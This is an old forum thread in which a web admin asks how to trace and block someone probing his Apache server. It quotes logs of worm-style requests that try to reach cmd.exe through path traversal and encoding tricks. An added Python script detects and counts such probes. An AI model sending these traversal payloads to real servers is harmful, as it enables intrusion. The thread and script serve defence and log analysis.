
Thread: finding out the MAC address through IP




  1. #1
    Join Date
    Sep 2002
    Posts
    1,636

    Default

    I have an issue with someone that keeps trying to hack me. I know their IP, it keeps coming up in Apache's logs all the time. But my router doesn't have IP block, only MAC address block. So how would I find someone else's MAC address through use of IP?
    BTW I tried pinging the IP, with no luck, Request timed out - error. I was thinking of a sniffer, but that would just give me the address of the router, right?
    Any help here would be appreciated.

  2. #2
    Join Date
    Dec 2002
    Posts
    4,246

    Default

    I don't know about the MAC address, but you can at least trace the IP back to the ISP, then file a complaint with them. Try using the tracert <IP> command from the command line.

    EDIT: you could also try a whois lookup at arin.net. While it won't give you a MAC address it will give you some detailed information about the provider.
    I've gone too far and need to move on!

  3. #3
    Join Date
    Dec 2002
    Location
    caves of bedrock
    Posts
    3,129

    Default

    http://www.youngzsoft.net/cc-get-mac-address/
    ^ that tool will let you find MAC from IP but I don't think you will be successful until you actually connect to the machine by way of ping or something like that, but you can still try. Since this person is sending "time out" while pinging, it looks like he/she is running a firewall.
    http://www.uwhois.com/
    ^ that is another site similar to what minibubba suggested.

  4. #4
    Join Date
    Nov 2001
    Posts
    1,599

    Default

    Quote Originally Posted by kane2g
    But my router doesn't have IP block, only MAC address block.
    Your router can only block MAC addresses that are connected through it.
    "In their capacity as a tool, computers will be but a ripple on the surface of our culture. In their capacity as intellectual challenge, they are without precedent in the cultural history of mankind." - Edsger Dijkstra

  5. #5
    Join Date
    Sep 2002
    Posts
    1,636

    Default

    Yeah, I figured that out :oops:
    But I am thinking of using something like www.smoothwall.org for my firewall, rather than the router.
    Guess banning the IPs will have to do.

  6. #6
    Join Date
    Nov 2001
    Posts
    1,599

    Default

    What do you mean, "will have to do" ? Hehe.... It's a flawless system.... 8)

  7. #7
    Join Date
    Sep 2002
    Posts
    1,636

    Default

    Well, just checking the logs every day and making sure someone didn't just get a fresh IP. Banning a MAC would make it a lot easier. But oh well. 'Tis the job of an admin I guess :wink:

  8. #8
    Join Date
    Nov 2001
    Location
    The Land of OZ!
    Posts
    674

    Default

    Hmm: if you can make a connection of some sort to the machine you should be able to query the physical address [MAC address] with the ARP command like so.

    arp -a a.b.c.d

    where a.b.c.d is the IP address.

  9. #9
    Beefy Guest

    Default

    I just thought of something. How are they trying to hack you?

  10. #10
    Join Date
    Sep 2002
    Posts
    1,636

    Default

    This is Apache's access log:


    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:44 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:44 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489



    Here is the error log:

    [Thu Mar 18 23:57:44 2004] [error] [client 67.167.106.111] File does not exist: C:/Apache2/htdocs/default.ida
    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/MSADC
    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/c
    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/d
    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/_vti_bin
    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/_mem_bin
    [Fri Mar 19 02:25:44 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/msadc
    [Fri Mar 19 02:25:44 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:46 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 05:27:42 2004] [error] [client 67.167.106.111] File does not exist: C:/Apache2/htdocs/default.ida

    I get similar errors from the following IPs.

    Whois tells me that most of them 67.x.x.x are Comcast :(
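
An added example, not part of any post in the thread: a short Python triage for access-log lines in the format posted in #10. It tags requests for cmd.exe/root.exe, path traversal, double percent-encoding and overlong UTF-8 sequences, and counts per client how many of those requests the server actually answered with content. The tag names and function names are chosen here for illustration; the sample is four lines taken from the log above.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Sample input: four lines copied from the access log quoted in post #10.
SAMPLE_LOG = """\
24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
"""

# Common Log Format: client, two ids, [time], "METHOD target PROTO", status, size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def classify(target):
    """Return the set of probe traits found in one request target."""
    tags = set()
    once = unquote(target)   # what a single URL-decode pass yields
    twice = unquote(once)    # what a second pass would yield
    if re.search(r'/(cmd|root)\.exe\b', target.lower()):
        tags.add("windows-shell-request")
    if re.search(r'\.\.[\\/]', twice):
        tags.add("traversal")
    # Escapes that survive one decode pass mean the path was encoded twice.
    if twice != once:
        tags.add("double-encoded")
    # %c0xx / %c1xx are two-byte encodings of ASCII characters, invalid in UTF-8.
    if re.search(r'%c[01]%[0-9a-f]{2}', target.lower()):
        tags.add("overlong-utf8")
    return tags

def summarize(log_text):
    """Group tagged requests by client IP; 'served' counts 2xx/3xx answers."""
    report = defaultdict(lambda: {"hits": 0, "tags": set(), "served": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        tags = classify(target)
        if tags:
            entry = report[ip]
            entry["hits"] += 1
            entry["tags"] |= tags
            entry["served"] += status[0] in "23"
    return dict(report)

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry["hits"], sorted(entry["tags"]), "served:", entry["served"])
```

A `served` count of zero, as with the 404 and 400 responses in the posted log, means none of the tagged requests returned content from this server.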
